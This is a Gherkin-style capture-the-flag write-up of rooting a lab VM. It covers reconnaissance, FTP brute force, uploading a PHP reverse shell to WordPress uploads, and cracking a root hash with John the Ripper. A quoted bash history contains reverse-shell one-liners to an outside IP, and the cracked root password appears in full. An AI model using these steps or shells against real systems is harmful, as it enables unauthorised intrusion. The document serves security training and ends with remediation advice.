## Version 1.4.1
## language: en

Feature:
  TOE:
    ragnar-lothbrok
  Category:
    Remote Code Execution
  Location:
    http://172.16.33.130:80/wordpress/wp-content/uploads/
  CWE:
    CWE-94: Improper Control of Generation of Code ('Code Injection')
  Rule:
    REQ.041: https://fluidattacks.com/products/rules/list/041
  Goal:
    Get remote connection and root privileges
  Recommendation:
    It’d better avoid uploading files in the FTP server without any validation
    which allow to verify that the uploaded file doesn't have malicious code

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Burp Suit Community Edition| 2021.2.1 |
    | Gobuster                   | 3.0.1    |
    | Nmap                       | 7.91     |
    | SearchSploit               | 3.8.3    |
    | ImageMagick                | 7.0.11   |
    | stegcracker                | 2.1.0    |
    | Netcat                     | 1.10     |
    | John the Ripper            | 1.9.0    |

  TOE information:
    Given a .OVF file
    When I saw its extension
    Then I executed it on vimware
    Then I saw that the machine was running Lubuntu
    And it was requesting a password as it's shown in [evidence](01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet1
    """
    And I got the next result
    """
    vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
    inet 172.16.33.1/24 brd 172.16.33.255 scope global vmnet1
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:1/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 172.16.33.0/24
    """
    And I got the next result
    """
    Nmap scan report for 172.16.33.1
    Host is up (0.0020s latency).
    Nmap scan report for 172.16.33.130
    Host is up (0.00090s latency).
    """
    Then I knew that 172.16.33.130 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -A 172.16.33.130
    """
    And I got the next result
    """
    PORT     STATE SERVICE  VERSION
    21/tcp   open  ftp      ProFTPD
    80/tcp   open  http     Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h
    PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0)
    |_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34
    mod_perl/2.0.11 Perl/v5.32.0
    | http-title: Welcome to XAMPP
    |_Requested resource was http://172.16.33.130/dashboard/
    443/tcp  open  ssl/http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h
    PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0)
    |_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34
    mod_perl/2.0.11 Perl/v5.32.0
    | http-title: Welcome to XAMPP
    |_Requested resource was https://172.16.33.130/dashboard/
    | ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/
    stateOrProvinceName=Berlin/countryName=DE
    | Not valid before: 2004-10-01T09:10:30
    |_Not valid after:  2010-09-30T09:10:30
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn:
    |_  http/1.1
    3306/tcp open  mysql?
    | fingerprint-strings:
    |   NULL:
    |_    Host '172.16.33.1' is not allowed to connect to this MariaDB server
    1 service unrecognized despite returning data. If you know the service
    /version, please submit the following fingerprint at
    https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port3306-TCP:V=7.91%I=7%D=3/8%Time=60463973%P=x86_64-pc-linux-gnu%r(NUL
    SF:L,4A,"F\0\0\x01\xffj\x04Host\x20'172\.16\.33\.1'\x20is\x20not\x20allowe
    SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
    """
    Then I saw that port 21 was used by FTP
    And HTTP and S were using ports 80 and 443 respectively with apache 2.4.46
    And port 3306 was used by MYSQL

  Scenario: Normal use case
    Given HTTP, HTTPS and FTP services were working on ports 80, 443 and 21
    Then I accessed to them using browser
    And thus I could see the main webpage [evidence](02.png)
    And FTP requesting password [evidence](03.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I decided to search possible hidden directories with gobuster
    Then I executed the below command
    """
    gobuster dir -u 172.16.33.130 -w /usr/share/seclists/Discovery/Web-Content/
    raft-large-words.txt -x php,html,txt -s 200,204,301,302,307,401
    """
    And thus I got the next output
    """
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://172.16.33.130
    [+] Threads:        10
    [+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-
    words.txt
    [+] Status codes:   200,204,301,302,307,401
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html,txt
    [+] Timeout:        10s
    ===============================================================
    2021/03/08 10:03:52 Starting gobuster
    ===============================================================
    /index.php (Status: 302)
    /img (Status: 301)
    /webalizer (Status: 301)
    /. (Status: 302)
    /wordpress (Status: 301)
    /dashboard (Status: 301)
    /applications.html (Status: 200)
    /secret (Status: 200)
    ===============================================================
    2021/03/08 11:22:20 Finished
    ===============================================================
    """
    Then I checked the img and webalizer directories
    And I didn't found any especial
    Then I revised the applications.html file but I didn't found any relevant
    Then I accessed to the secret directory
    And there I saw a long list of words [evidence](04.png)
    Then I saved those words in a text
    Then I entered to the wordpress directory
    Then I saw an interesting webpage as it can see in [evidence](05.png)
    Then I looked an image which hadn't loaded correctly
    Then I clicked on it
    And I was redirected to the link below
    """
    http://armbjorn/wordpress/wp-content/uploads/2020/12
    /lagertha-vikingos-k36E-1024x512@abc.jpg
    """
    Then I replaced armbjorn for the targets machinne's ip address
    Then I watched the image clearly [evidence](06.png)
    Then I downloaded that image
    And I analyzed its metadata with ImageMagick but I didn't found anything
    Then I try searching a hidden message with stegcracker but it didn't work
    Then I checked the comment written by ragnar user
    And I didn't discover anything relevant
    Then I decided to scan that directory with gobuster too
    """
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://172.16.33.130/wordpress
    [+] Threads:        10
    [+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/
    raft-large-words.txt
    [+] Status codes:   200,204,301,302,307,401
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html,txt
    [+] Timeout:        10s
    ===============================================================
    2021/03/08 10:24:08 Starting gobuster
    ===============================================================
    /wp-admin (Status: 301)
    /wp-includes (Status: 301)
    /wp-content (Status: 301)
    /index.php (Status: 301)
    /wp-login.php (Status: 200)
    /. (Status: 301)
    /readme.html (Status: 200)
    /wp-trackback.php (Status: 200)
    /license.txt (Status: 200)
    /wp-config.php (Status: 200)
    /wp-settings.php (Status: 200)
    /wp-cron.php (Status: 200)
    /wp-blog-header.php (Status: 200)
    /wp-links-opml.php (Status: 200)
    /wp-load.php (Status: 200)
    /wp-signup.php (Status: 302)
    /wp-activate.php (Status: 302)
    ===============================================================
    2021/03/08 11:22:11 Finished
    ===============================================================
    """
    Then I entered to the readme.html file
    Then I clicked on a link in that web page [evidence](07.png)
    Then I was redirected to another web page
    And there I saw a link with a login link [evidence](08.png)
    Then I entered to that webpage [evidence](09.png)
    And I tried accessing but I was redirected to a wrong domain
    Then I did a post request using burp suit and that worked correctly
    Then I tried a brute force attack using the intruder module of burp suit
    And while that attack was running [evidence](10.png)
    Then I did another brute force attack using medusa to the FTP server
    And there I used ragnar as the user
    And the list found previously as the wordlist
    And thus I found out the password for the FTP server [evidence](11.png)
    Then I entered to the FTP server with that credentials
    And there I accessed the wordpress directory
    Then  accessed to the wp-content directory
    And there I entered to the uploads directory
    Then I listed the files in that directory
    And thus I noted that I had enough permissions to upload a file
    """
    drwxrwxrwx   3 33       33           4096 Dec  3 19:13 2020
    drwxrwxrwx   3 1        1            4096 Mar 10 13:51 2021
    """
    And I saw that in the 2020 directory was the image that I found previously
    Then therefore I could upload files in those directories
    And I could accessed to them without any authentication
    Then I downloaded a php reverse shell from the link below
    """
    https://github.com/pentestmonkey/php-reverse-shell/blob/master/
    php-reverse-shell.php
    """
    Then I modified the ip parameter with my own ip
    Then I uploaded that file in the 2021 directory as it's shown below
    """
    ftp> cd wordpress/wp-content/uploads/2021
    250 CWD command successful
    ftp> ls
    200 PORT command successful
    150 Opening ASCII mode data connection for file list
    drwxrwxrwx   2 1        1            4096 Mar  8 15:22 03
    226 Transfer complete
    ftp> cd 03
    250 CWD command successful
    ftp> cd ..
    250 CWD command successful
    ftp> put php-reverse.php
    local: php-reverse.php remote: php-reverse.php
    200 PORT command successful
    150 Opening BINARY mode data connection for php-reverse.php
    226 Transfer complete
    5490 bytes sent in 0.00 secs (40.2744 MB/s)
    """
    Then I executed the following command with netcat
    """
    nc -lvnp 1234
    """
    And thus I put the port 1234 in listen mode

  Scenario: Exploitation
    Given previously I'd put the port 1234 in listen mode
    Then executed the uploaded php file
    And thus I got remote connection to the target system [evidence](12.png)
    Then I searched information about kernel system with the below command
    """
    uname -a
    """
    And I got the following information
    """
    Linux osboxes 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC
    2020 x86_64 x86_64 x86_64 GNU/Linux
    """
    Then I searched an exploit for that kernel but I didn't found any for that
    Then I entered to the home directory
    And there I saw the ragnar directory but I didn't have permission to see it
    Then I executed the next command
    """
    su ragnar
    """
    Then I tried lagertha as a password too in this case
    And thus I could accessed to that account
    """
    whoami
    ragnar
    """
    Then I listed the ragnar directory
    Then I got the next output
    """
    drwx------ 14 ragnar ragnar  4096 Mar 10 10:22 .
    drwxr-xr-x  3 root   root    4096 Dec  4 06:42 ..
    -rw-------  1 ragnar ragnar   610 Dec  4 07:07 .bash_history
    -rwx------  1 ragnar ragnar   220 Dec  3 12:54 .bash_logout
    -rwx------  1 ragnar ragnar  3771 Dec  3 12:54 .bashrc
    drwx------  8 ragnar ragnar  4096 Dec  3 15:10 .cache
    drwx------ 13 ragnar ragnar  4096 Dec  4 06:35 .config
    drwx------  2 ragnar ragnar  4096 Mar 10 10:23 Desktop
    -rwx------  1 ragnar ragnar    25 Dec  3 15:37 .dmrc
    drwx------  2 ragnar ragnar  4096 Dec  3 13:46 Documents
    drwx------  2 ragnar ragnar  4096 Dec  3 14:55 Downloads
    drwx------  3 ragnar ragnar  4096 Dec  3 13:45 .gnupg
    drwx------  3 ragnar ragnar  4096 Dec  3 13:45 .local
    drwx------  2 ragnar ragnar  4096 Dec  3 13:46 Music
    drwx------  2 ragnar ragnar  4096 Dec  3 13:46 Pictures
    -rwx------  1 ragnar ragnar   807 Dec  3 12:54 .profile
    drwx------  2 ragnar ragnar  4096 Dec  3 13:46 Public
    -rwx------  1 ragnar ragnar    10 Dec  3 14:48 .python_history
    -rwx------  1 ragnar ragnar   112 Dec  3 13:49 secret
    drwx------  2 ragnar ragnar  4096 Dec  3 13:46 Templates
    drwx------  2 ragnar ragnar  4096 Dec  3 13:46 Videos
    -rw-------  1 ragnar ragnar    52 Mar 10 10:22 .Xauthority
    -rw-------  1 ragnar ragnar 76758 Mar 10 10:23 .xsession-errors
    """
    Then I checked the bash_history file
    """
    cd /opt/lampp/htdocs/
    su www-data
    ls
    ls -la
    su root
    ls
    cd
    ls
    rm -r .mozilla/
    ls -a
    cd ..
    ls
    ls -a
    ls -l
    chmod 700
    chmod 700 ragnar/ -R
    su
    su root
    chmod 700 ragnar/ -R
    ls
    ls -l ragnar/
    cd ragnar
    ls
    cat secret
    ls
    ls -a
    rm .bash_history
    cat secret
    ifconfig
    nc 192.168.0.105 1234
    bash -i >& /dev/tcp/192.168.0.105/9999/ 0>&1
    nc -e /bin/sh 192.168.0.105 9999
    su root
    ls -l
    poweroff
    """
    When I analyzed its content
    Then I noted that previously someone visualized the secret file
    Then I checked that file
    And thus I could look the next output
    """
    root:$6$hPrOGn8aOKa2ZMJm$gGKkorDjENhohzGBojBLO3ABOJEP/DjMtjRRl6FBlNAc
    .l.BnoH8rMWtWZiJGCTt2Nq5e7DFe51RRRTXjzN5h
    """
    When I analyzed that format
    Then I noted that it was the content of /etc/shadow file for the root user
    Then I copied that password in text file
    And I used John the Ripper with the command below
    """
    john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt
    root_pass.txt
    """
    And thus I could find out the encrypted password
    """
    Using default input encoding: UTF-8
    Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
    Cost 1 (iteration count) is 5000 for all loaded hashes
    Will run 8 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    kevinmitnick     (?)
    1g 0:00:04:29 DONE (2021-03-10 14:43) 0.003716g/s 3333p/s 3333c/s 3333C/s
    kid111..ketepasa
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    john --show root_pass.txt
    ?:kevinmitnick
    1 password hash cracked, 0 left
    """
    Then I logged me with that password as the root user
    """
    su
    Password: kevinmitnick
    whoami
    root
    """
    And thus I solved the challenge finally [evidence](13.png)

  Scenario: Remediation
    Given the FTP server allow to upload files without the correct validation
    And it isn't to assure that the content didn't have malicious code
    And it's likely to access files from the web server without authentication
    And the managing passwords are weak
    Then it'd better avoid uploading files without the corresponding validation
    And avoid accessing to the files from the web server without authentication
    And establish good password policies to have strong passwords

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     8/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.9/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.9/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-10
